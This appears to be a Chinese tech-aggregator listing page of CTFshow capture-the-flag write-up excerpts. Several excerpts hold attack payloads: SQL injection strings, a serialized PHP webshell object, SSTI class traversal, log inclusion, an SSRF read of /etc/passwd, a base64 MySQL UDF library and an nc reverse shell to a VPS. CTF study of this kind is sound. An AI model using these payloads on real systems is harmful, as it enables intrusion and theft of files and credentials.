E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
ctfshow
ctfshow
web175-183
目录Web175Web176Web177Web178Web179Web180Web181Web182Web183Web175if(!preg_match('/[\x00-\x7f]/i',json_encode($ret)))刚开始不知道这句话是什莫意思,还在尝试之前的方法,发现没用。\xnn匹配ASCII代码中十六进制代码为nn的字符[\x00-\x7f]匹配ASCII值从0-127的字符所以A
f0njl
·
2022-12-06 16:54
ctfshow
sql
2022
CTFSHOW
菜狗杯部分题目(四)
(WEB)TapTapTap-
ctfshow
【JS代码】这道题跟WEB其实没啥关系。网页游戏类的题目直接查看其源代码。在JS文件中找到一串BASE64编码的字符串。
复苏之枫
·
2022-11-29 22:14
CTF刷题记录
php
开发语言
CTFShow
-WEB(签到题~5) WP
文章目录web签到题web2web3web4web5web签到题F12查看源码即可web2尝试万能密码admin'or1=1#1.orderby查找回显数username=
ctfshow
'orderby3
叫我PP
·
2022-11-29 22:14
CTF
web安全
2022
CTFSHOW
菜狗杯部分MISC(二)
11.15WP(MISC)youandme-
ctfshow
【盲水印】打开附件,得到两张一样的图:使用盲水印工具:blindWaterMarkpybwmforpy3.pydecodeyou.pngyou_and_me.pngwm1
复苏之枫
·
2022-11-29 22:44
CTF刷题记录
安全
2022
CTFSHOW
菜狗杯部分题目(三)
(MISC)一层一层一层地剥开我的♥-
ctfshow
【RAR文件头修复|docx|文件分离|base100】下载附件:打开发现是个word文档,改zip后缀为docx打开后发现是一堆符号:全选内容修改字体
复苏之枫
·
2022-11-29 22:44
CTF刷题记录
word
CTFshow
2022 菜狗杯 WEB WP补充
菜狗杯化零为整传说之下(雾)算力超群算力升级easyPytHon_P茶歇区LSB探姬Is_Not_Obfuscate化零为整题目1){die("你太长了!!");}else{$result=$result.$_GET[$i];}}if($result==="大牛"){echo$flag;}确实没有想到url编码还能拆开,重新拼回去还能成,涨姿势了。Payload?1=%E5&2=%A4&3=%A7
Sn_u
·
2022-11-29 22:44
web安全
2022
CTFSHOW
菜狗杯部分MISC(一)
11.14WP(MISC)迷之栅栏-
ctfshow
【010editor文件比较】解压附件得到2张图:用010打开,使用比较文件功能,查看两个图片的十六进制字符串不同的部分:cfhwfaab2cb4af5a5820
复苏之枫
·
2022-11-29 22:44
CTF刷题记录
安全
CTFshow
2022 菜狗杯部分WEB WP
文章目录web签到web2c0me_t0_s1gn我的眼里只有$抽老婆一言既出驷马难追TapTapTapwebshell无一幸免遍地飘零小舔田web签到套娃题,自己本地搭环境,慢慢试就试出来了cmd='tacf*';}}$a=newWebshell();echourlencode(serialize($a));?>O%3A8%3A%22Webshell%22%3A1%3A%7Bs%3A3%3A%2
Sn_u
·
2022-11-29 22:14
web安全
Ctfshow
菜狗杯------传说之下(雾)
探姬姐出题真的好啊55555,哭死(探姬misc题福利拉满)看到题目是个游戏题,要分数达到2077我们f12在源代码的game.js的this.score这里打一个断点点击游戏中的开始后点一下这里的暂停键可以看到作用域拉开这里有一个score双击将其修改为2077这时候恢复脚本执行,吃一个果子,切换到控制台可以看到flagctfshow{Under0ph1di4n_n0!_...underrrrr
Fxe0_0
·
2022-11-29 22:12
网络安全
菜狗杯Web签到wp
其实第二道题才是签到吧……虽然这题会了的话也不难,但是不会的时候那感觉可就太难了(拿到官方wp依然复现好久拿不到flag的人是我QAQ题目打开如下:大概就是套了三层吧,首先给cookie的’
CTFshow
-QQ
好想变强啊
·
2022-11-29 22:10
备战CTF中遇到的题目
http
网络安全
web安全
ctfshow
菜狗杯wp
果然菜狗杯是教育我们是菜狗的,我是从第二天开始做的,这里只做了一个上午,因为下午网没了,做不了,做出来的有点少。。。社工也做出来挺多但是感觉社工的wp感觉就没有啥必要写了目录misc签到题损坏的压缩包webweb2c0me_t0_s1gn我的眼里只有$抽老婆一言既出驷马难追TapTapTapWebshell化零为整无一幸免无一幸免_FIXED传说之下(雾)算力超群(后面补的)算力升级(后面补的)e
练习两年半的篮球选..哦不对安全选手
·
2022-11-29 22:39
CTF
python
flask
学习
经验分享
后端
ctfshow
-菜狗杯-WEB-wp
文章目录web1web签到web2c0me_t0_s1gnweb3我的眼里只有$web4抽老婆web5一言既出web6驷马难追web7TapTapTapweb8Webshellweb9化零为整web10无一幸免web11传说之下(雾)web12算力超群web13算力升级web14easyPytHon_Pweb15遍地飘零web16茶歇区web17小舔田?web18LSB探姬web19Is_N
陪你等待
·
2022-11-29 22:09
wp
web安全
CTFshow
MISC 杂项签到~misc4
1.杂项签到下载后发现是一个压缩包,但是直接打开提示压缩包文件头部已损坏猜测是Zip伪加密,使用ZipCenOp.jar进行解密可直接解压,打开flag.txt,发现flagflag{79ddfa61bda03defa7bfd8d702a656e4}2.misc2打开压缩包发现无后缀名文件,记事本打开发现除了乱码,还有flagnothereFAT11,猜想flag与FAT11有关(软盘:最早的可移
七堇墨年
·
2022-11-29 22:09
java
CTFshow
菜鸡杯WP
WEBWEB1签到|\?|\/|\\\|\{|\[|\}|\]|\=|\+|\-|\_|\;|\:|\'|\"/i',$_GET['url'])){eval("include".$_GET['url'].";");}else{die('error');}break;}}else{highlight_file(__FILE__);}可以看到过滤的巨全面,包括php,flag,?等一并被过滤了,但是页
車鈊
·
2022-11-29 22:08
#
Write
Up
安全
ctfshow
(菜狗杯)
目录web签到一言既出驷马难追web2c0me_t0_s1gn我的眼里只有$TAPTAPTAPWebshell化零为整无一幸免遍地飘零传说之下(雾)Is_Not_Obfuscateweb签到init();}publicfunctioninit(){if(!preg_match('/flag/i',$this->cmd)){$this->exec($this->cmd);}}publicfuncti
偶尔躲躲乌云334
·
2022-11-29 22:38
php
开发语言
ctfshow
萌新赛 给她
初识:一开始看到这个题目以为是sql注入,尝试了各种sql注入转义次都注入不了.git泄露:最后还是看了一下大佬的解题,发现方向就错了,“给她”——“git”,这题的入口是.git泄露。我是纯小白,看到这又去了解了一次啊.git泄露,有个大佬写得非常详细https://blog.csdn.net/qq_45521281/article/details/105767428GitHack下载地址:ht
沐沐晓禾
·
2022-11-16 09:01
ctf
ctf
ctfshow
CTF刷题网站汇总(包括本地可以自己搭建的)(1)
CTF刷题网站汇总(包括本地可以自己搭建的)CTF刷题平台汇总(欢迎各位师傅们补充)第一个当然是
CTFshow
啦!
qq_51550750
·
2022-11-15 10:47
CTF刷题
web安全
安全
CTFSHOW
SSTI篇
文章目录web361web362web363web364web365web366、367web368web369web370web371web372跟大佬交换了思路学到了可以用全角数字代替正常数字,大家可以自行探索了。。。。。。建议大家先看下笔者之前写的模板注入的文章web361payloadname={{().__class__.__mro__[-1].__subclasses__()[132]
yu22x
·
2022-11-09 12:21
CTFSHOW
web入门系列
[
ctfshow
]web入门——反序列化(web261+web264-web267)
[
ctfshow
]web入门——反序列化
ctfshow
:https://ctf.show/challenges#web261-721群主的视频wp:https://www.bilibili.com/video
shu天
·
2022-10-09 11:33
ctf
#
web
ctfshow
ctf
web
反序列化
serialize
html ctf查找,
CTFSHOW
的web部分writeup
WEB2题目提示是简单的SQL注入,于是尝试输入点中使用万能密码:admin‘or1=1#(CTF中SQL万能密码集合)发现成功执行,于是orderby查找回显数username=
ctfshow
‘orderby3
Roy Kid
·
2022-10-09 11:32
html
ctf查找
CTFSHOW
[卷王杯](上)
这个比赛早在二月底就结束了,其实很早就想写wp了,但是有很多知识点没写,就拖到现在了。easyunserialize";global$flag;echo$flag;}});}publicfunction__destruct(){@$this->object->add();}publicfunction__toString(){return$this->object->string;}}classs
errorr0
·
2022-10-09 11:59
刷题+WP
php
开发语言
安全
web安全
ctfshow
卷王杯部分web
ctfshow
卷王杯web部分[easyunserialize&easyweb]文章目录
ctfshow
卷王杯web部分[easyunserialize&easyweb]easyunserialize了解
Pysnow
·
2022-10-09 11:58
WP
前端
php
安全
ctfshow
萌新赛经验总结
签到题就从做题顺序开始记录,这题真的很签到。有system函数在,应该就是命令执行了。唯一注意的点就是分号分隔一下。用;ls;查看flag文件,再用;catflag;得到flag。给她刚开始还不知道题目名字的含义,就一直在那注入,后来才知道给她翻译过来就是git,git泄露得到源码一部分。addslashes函数就是对pass传进来的数据进行过滤,把预定义好的单双引号和反斜杠都进行了转义。这里就要
XiLitter
·
2022-10-09 11:58
#
web
php
开发语言
ctfshow
-卷王杯
easywebeasyunserializeeasyweb源码提示数组溢出+原生类读取c=9223372036854775806&a=DirectoryIterator&b=glob://flag[0-9a-z]*.phpc=9223372036854775806&a=SplFileObject&b=flag56ea8b83122449e814e0fd7bfb5f220a.phpeasyunser
Fnylad
·
2022-10-09 11:28
php
开发语言
后端
ctfshow
卷王杯
ctfshow
卷王杯写在前面:这次的做出一道php题,通过这次的比赛,深入理解反序列化漏洞,通过复现学到了很多新的点参考一篇特别详细的wpeazyunserialize(复现)源码";global$flag
Y3g@d
·
2022-10-09 11:56
Write
Up
python
深度优先
宽度优先
CTFSHOW
新生杯web
easy_eval利用script标签绕过code=system("cat/f*");不过只有php5可以用剪刀石头布考查session反序列化漏洞。不同的session处理器会导致反序列化漏洞,具体的可以参考下这篇文章https://www.jb51.net/article/107101.htm题目中通过ini_set将session的处理器改为了php,而在phpinfo中可以看到默认的为ph
yu22x
·
2022-10-09 11:24
前端
php
安全
CTFShow
代码审计
CTFShow
代码审计Web301Web302Web303Web304Web305Web306Web307Web308Web309Web310Web301题目环境,用Seay自动审计了一下,啥也没找出来自己来
paidx0
·
2022-09-28 22:19
CTFShow刷题篇
web安全
ctfshow
-萌新(持续更新)
感谢
ctfshow
平台供题,平台地址:https://ctf.show/2021年1月23日,大吉大利杯盛大开幕,欢迎小伙伴们前来参赛目录萌新认证萌新_密码1萌新_密码2萌新密码3萌新密码#4隐写1隐写
i_kei
·
2022-09-26 07:15
CTFshow
信息安全
ctfshow
做题 萌新 模块(1)
ctfshow
做题萌新模块(1)——萌新认证加qq群发“萌新码”得到萌新快乐码。————萌新_密码1可以猜测出,显示的是一串16进制码。
Goodric
·
2022-09-26 07:39
做题
ctfshow
萌新
ctfshow
web入门 php特性
web89intval()函数用于获取变量的整数值,可preg_match过滤了数字,这里可以用数组绕过,因为preg_match无法处理数组涉及到了一个三目运算$_GET?$_GET=&$_POST:‘flag’;//如果使用GET传参,则使用POST传参来代替$_GET[‘flag’]==‘flag’?$_GET=&$_COOKIE:‘flag’;//如果GET传参flag的值=flag则将c
Sentiment.
·
2022-09-23 20:20
CTFshow
CTF
WP
网络安全
其他
前端
ctfshow
密码挑战
真·biginner给出了m=PolynomialRing(Zmod(Ns[i]))f=x+pas[i]f=f.monic()#print(f)p_solve=f.small_roots(X=2**160,beta=0.42)#ps.append(int(p_solve[0]+pas[i]))print(ps)defdecrypt(c,d,n):returnpow(c,d,n)fromCrypto
PUTAOAO
·
2022-09-23 13:02
刷题记录
其他
CTFSHOW
七夕杯web
文章目录web签到easy_cmdeasy_cmdeasy_sqlweb签到有长度限制payloadls/>anl/*>a然后访问a即可得到flageasy_cmdpayloadnum1=1;include"/var/log/nginx/access.log";&symbol=-&num2=3然后就是日志包含那一套easy_cmd通过nc-e向自己的vps传递命令ncx.x.x.xport-els
yu22x
·
2022-09-20 08:08
linux
运维
服务器
ctfshow
终极考核web654
web654上传上去木马后进行udf提权参考文章so文件下载地址提取码:pgns因为不好直接上传so文件,可以先将他在本地base64编码cata.so|base64然后把输出的内容复制下来可能有换行需要给去掉echo"f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAA0AwAAAAAAABAAAAAAAAAAOgYAAAAAAAAAAAAAEAAOAAFAEAAGgAZAAEAAA
yu22x
·
2022-08-02 08:54
sql
ctf
ctfshow
网络迷踪做题记录(2)
ctfshow
网络迷踪做题记录(2)——致我超吧题目描述:
ctfshow
{主角ID_vs_对手id}(全小写)下载附件为gif图片展示某个游戏的战斗。。咱也不知道是啥游戏。
Goodric
·
2022-07-25 10:27
做题
ctfshow
网络迷踪
ctfshow
网络迷踪做题记录(1)
ctfshow
网络迷踪做题记录(1)——新手上路找桥的名字。附件为一张海边图片。百度识图为蜈支洲岛,得到地点名,但还需要具体桥的名字。再用搜索引擎搜索关键字,就可以看到结果中的“情人桥”。
Goodric
·
2022-07-25 10:27
做题
ctfshow
osint
ctfshow
之web(9、10、11、12)
目录萌新web9web10:web11:web12萌新web9提示是在config.php文件里面highlight_file()函数对文件进行PHP语法高亮显示。语法通过使用HTML标签进行高亮。提示:用于高亮的颜色可通过php.ini文件进行设置或者通过调用ini_set()函数进行设置。注释:当使用该函数时,整个文件都将被显示,包括密码和其他敏感信息!highlight_file('conf
沃和莱特
·
2022-07-24 12:29
ctf
php
开发语言
[WEB]php特性
因为没钱充
ctfshow
会员,只能跟着视频教程白嫖89intval绕过提交一个不为空的数组即可绕过?num[]=//就直接绕过了intval详解90进制转换直接绕过?
开心星人
·
2022-07-20 15:40
Web安全
web安全
php
CTFSHOW
反序列化篇
文章目录web254web255web256web257web258web259web260web261web262web263web264web265web266web267web268web269web270web271web272、273web274web275web276web277278笔者太菜了,没解出来261T_Tweb254没搞懂和反序列化有啥关系,直接传username=xxxx
yu22x
·
2022-07-04 21:16
CTFSHOW
web入门系列
CTFSHOW
SQL注入篇(231-253)
文章目录231232233234235236237238239240241242243244245246247248249250基础语法数据库操作集合操作251252253231update注入题目里面其实是存在两个功能的,一个是update,还有一个select。不过我们访问update.php,就知道执行了。所以只要把查询表或者列的语句更新给用户名或者密码就可以了。#获取所有表名passwor
yu22x
·
2022-07-04 21:45
CTFSHOW
web入门系列
sql
web安全
安全
CTFSHOW
框架复现篇
文章目录web466web467web468web469|web470web471web472web473web474web475web476web466反序列化格式/admin/序列化串base64参考文章https://xz.aliyun.com/t/11002payloadextensions=[''=>'system'];}}}namespaceIlluminate\Broadcastin
yu22x
·
2022-07-04 21:15
CTFSHOW
web入门系列
ctf
CTFSHOW
权限维持篇
文章目录web670-web676web677、web678web679web670-web676题目在进行check后,会删掉网站根目录下的所有文件。方法一预测是使用的如下命令echo'flag{xxxx}'>/flag_xx.txtrm-rf*rm-rf*其实有个小缺陷,无法删除点号开头的文件,所以可以利用给的木马生成一个.shell.php的木马,check后还会保留。方法二使用反弹shel
yu22x
·
2022-07-04 21:15
CTFSHOW
web入门系列
php
开发语言
web351-360(
ctfshow
刷题记录)
SSRFweb351#curl_init—初始化cURL会话 #curl_setopt—设置一个cURL传输选项#curl_exec—执行cURL会话#curl_close—关闭cURL会话这一题并没有过滤,传入的url直接执行,所以可以使用file协议去读文件url=file:///etc/passwd或者直接访问该文件url=http://127.0.0.1/flag.phpctfshow
北子Beizi
·
2022-06-29 16:22
php
web安全
ctf.show刷题记录_web(1-10)
ctf平台(
ctfshow
)`https://ctf.show/1、签到解题:base64解码
ctfshow
{0da357d0-359b-47e1-80dc-5c02212725e5}2、web2解题:
god_mellon
·
2022-06-29 15:15
CTF
前端
bash
linux
[
ctfshow
]web入门——文件上传(web156-web163)
[
ctfshow
]web入门——文件上传(web156-web163)[
ctfshow
]web入门——文件上传[
ctfshow
]web入门——文件上传(web156-web163)web156上传.user.iniweb157web158web159web160
shu天
·
2022-06-28 14:24
ctf
#
web
php
web
ctf
文件上传
[
ctfshow
]2022 新春欢乐赛 wp
热身开局看到源码,但是却没有显示源码的代码。那么只能是被包含进去了,直接phpinfo搜prepend可以看到包含的文件,查看之得到flag。?f=system("tacetc/ssh/secret/youneverknow/secret.php");web1highlight_file(__FILE__);error_reporting(0);$content=$_GET[content];fi
Snakin_ya
·
2022-06-28 14:32
刷题记录
php
开发语言
后端
ctfshow
web(日志注入&简单回显盲注&&with rollup注入绕过)
web3php伪协议的标志。没有提示我们flag在哪个文件,filter试一下flag.php,flag,txt,flag都没有用php://input试一下,burp抓包发现了ctf_go_go_go,应该就是我们的flag文件。post传入cat一下,得到flag。web4include()函数包含的文件会被执行,从而造成任意代码执行,或者配合伪协议获取敏感文件甚至getshell;这一关相比
葫芦娃42
·
2022-05-26 18:18
ctfshow
php
开发语言
ctfshow
-web入门信息搜集(小宇特详解)
ctfshow
-web入门信息搜集web1-源码这个就比较简单了,直接f12去进行查看源码就找到了源码。
小宇特详解
·
2022-04-25 10:47
ctfshow
ctfshow
CTFSHOW
大赛原题篇(web771-web790)
因为题目较多,所以很多地方写的比较简略,望师傅们谅解。。暂时先更新到这了,毕竟还是要工作的。。。。文章目录web771web773web774web775web776web777web778web779web780web781web782web784web785web786web787web788web789web790web771GXYCTF2019你的名字题目过滤了{{}}只要使用就直接报错,
yu22x
·
2022-03-25 14:53
ctfshow
大赛原题系列
ctf
django
python
CTFSHOW
大赛原题篇(web756-web770)
因为题目较多,所以很多地方写的比较简略,望师傅们谅解。。文章目录web756web757web758web759web760web761web762web763web764web765web766web767web768web769web770web756code=GLOBALSweb757每次传入的key前七个字符需要是上传返回的,并且substr(md5($value),5,4)==0)因为不
yu22x
·
2022-03-25 14:23
ctfshow
大赛原题系列
ctf
django
python
CTFSHOW
xss篇
web316xss平台https://xss.pt/xss.php创建项目选择默认模块一直下一步,然后随便那个代码放到题目输入框中再刷新下题目最后看下项目结束web317、318、319317过滤了script318过滤了img在那些代码中找没有script和img的然后出不来flag就多试几次,我试的这个是可以的web320、321、322过滤了空格用tab键代替空格,代码还是用上面的web32
yu22x
·
2022-03-25 14:23
上一页
9
10
11
12
13
14
15
16
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他